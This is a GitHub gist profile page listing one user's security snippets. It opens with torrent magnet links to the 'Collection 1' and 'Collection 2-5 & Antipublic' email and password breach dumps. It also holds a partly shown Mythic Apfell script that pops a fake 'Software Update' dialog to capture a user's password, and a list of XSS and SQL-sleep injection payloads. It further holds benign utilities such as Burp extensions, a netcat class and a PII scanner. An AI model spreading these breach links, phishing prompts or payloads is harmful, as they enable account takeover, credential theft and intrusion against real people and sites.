Skip to content

Instantly share code, notes, and snippets.

View jimmy-ly00's full-sized avatar

Jimmy jimmy-ly00

View GitHub Profile
@jimmy-ly00
jimmy-ly00 / breach.txt
Created May 20, 2024 21:31 — forked from fawazahmed0/breach.txt
Email and password breach collection list
# Please Note, I am sharing this, hoping this will be used for good public use, such as data analysis, penetration testing etc
# These links are already available all over the internet
# Also Note, Trying to login into someone else's account without their permission is unethical and illegal
# Collection 1
magnet:?xt=urn:btih:B39C603C7E18DB8262067C5926E7D5EA5D20E12E&dn=Collection%201&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce
# Collection 2-5 & Antipublic
magnet:?xt=urn:btih:D136B1ADDE531F38311FBF43FB96FC26DF1A34CD&dn=Collection%20%232-%235%20%26%20Antipublic&tr=udp%3a%2f%2ftracker.coppersurfer.tk%3a6969%2fannounce&tr=udp%3a%2f%2ftracker.leechers-paradise.org%3a6969%2fannounce&tr=http%3a%2f%2ft.nyaatracker.com%3a80%2fannounce&tr=http%3a%2f%2fopentracker.xyz%3a80%2fannounce
@jimmy-ly00
jimmy-ly00 / vscode-macos-context-menu.md
Created April 21, 2024 16:04 — forked from idleberg/vscode-macos-context-menu.md
“Open in Visual Studio Code” in macOS context-menu

Open in Visual Studio Code

  • Open Automator
  • Create a new document
  • Select Quick Action
  • Set “Service receives selected” to files or folders in any application
  • Add a Run Shell Script action
    • your default shell should already be selected, otherwise use /bin/zsh for macOS 10.15 (”Catalina”) or later
    • older versions of macOS use /bin/bash
  • if you're using something else, you probably know what to do 😉
@jimmy-ly00
jimmy-ly00 / extract_cn.py
Created February 8, 2024 14:18
Extract common name from TLS certificate via URLs
import ssl
import socket
from urllib.parse import urlparse
from cryptography import x509
from cryptography.hazmat.backends import default_backend
def get_certificate_common_name(url, timeout=3):
# Parse the URL to get the hostname
parsed_url = urlparse(url)
hostname = parsed_url.hostname
@jimmy-ly00
jimmy-ly00 / pdscan_recursive.py
Last active June 14, 2022 14:58
Find PII (Personally Identifiable Information) using pdscan
import glob
from selectors import EpollSelector
import subprocess
# Change these
ROOT_DIR = "/home/jimmy/desktop/spam"
PDSCAN_FILE = "/home/jimmy/desktop/pdscan" # Download from https://github.com/ankane/pdscan#installation
for filename in glob.iglob(ROOT_DIR + '**/**', recursive=True):
result = subprocess.run([PDSCAN_FILE, "file://" + filename,"--show-data", "--show-all"], capture_output=True, text=True) # remove "--show-all" for high confidence results
@jimmy-ly00
jimmy-ly00 / prompt.js
Created June 26, 2021 02:48
Mythic Apfell manual prompt.js
function myprompt(){
var app = Application.currentApplication()
app.includeStandardAdditions = true
var dialogText = "An application needs permission to update"
var title = "Software Update"
var iconPath = "/System/Library/PreferencePanes/SoftwareUpdate.prefPane/Contents/Resources/SoftwareUpdate.icns"
try{
var prompt = app.displayDialog(dialogText, {
givingUpAfter: "300",
defaultAnswer: "",
@jimmy-ly00
jimmy-ly00 / burp-external.py
Last active August 6, 2021 14:17
burp-external-crypto-invoke-header
from burp import IBurpExtender
"""
Name: External Crypto Header
Version: 0.0.1
Date: 10/03/2021
Author: Jimmy Ly
Github: https://github.com/jimmy-ly00
Description: This plugin adds headers useful for XXX
"""
@jimmy-ly00
jimmy-ly00 / burp-digest-hash.py
Created March 10, 2021 16:32
Burp extension to add a digest header with custom hashing of the bearer token header and request body (parameters). E.g. Digest: SHA512(Bearer Token Value + Parameters)
from burp import IBurpExtender
"""
Name: Digest Hash Header
Version: 0.0.1
Date: 10/03/2021
Author: Jimmy Ly
Github: https://github.com/jimmy-ly00
Description: This plugin adds headers useful for XXX
"""
@jimmy-ly00
jimmy-ly00 / ciphers.txt
Created July 23, 2018 15:33
List of OpenSSL ciphers
aes-128-cbc
aes-128-cfb
aes-128-cfb1
aes-128-cfb8
aes-128-ctr
aes-128-ecb
aes-128-ofb
aes-192-cbc
aes-192-cfb
aes-192-cfb1
@jimmy-ly00
jimmy-ly00 / netcat.py
Created June 23, 2018 09:36 — forked from leonjza/netcat.py
Python Netcat
import socket
class Netcat:
""" Python 'netcat like' module """
def __init__(self, ip, port):
self.buff = ""
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
@jimmy-ly00
jimmy-ly00 / xss.txt
Last active January 17, 2021 17:06
XSS payload (taken from: https://sql--injection.blogspot.co.uk/p/blog-page_80.html + other gist + some of my own)
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
"/><script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
"<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 120, 115, 115, 39, 41))</script>
onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"
 /*
/*! SLEEP(1) /*/ onclick=alert(1)//<button value=Click_Me /*/*/ or' /*! or SLEEP(1) or /*/, onclick=alert(1)//> /*/*/'or" /*! or SLEEP(1) or /*/, onclick=alert(1)// /*/*/"
 /*
javascript:alert()//<svg/onload=alert()>'-alert("-alert()-")-'
" onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//>
<button ' onclick=alert(1)//>*/alert(1)//
" onclick=alert(1)//<button ' onclick=alert()//>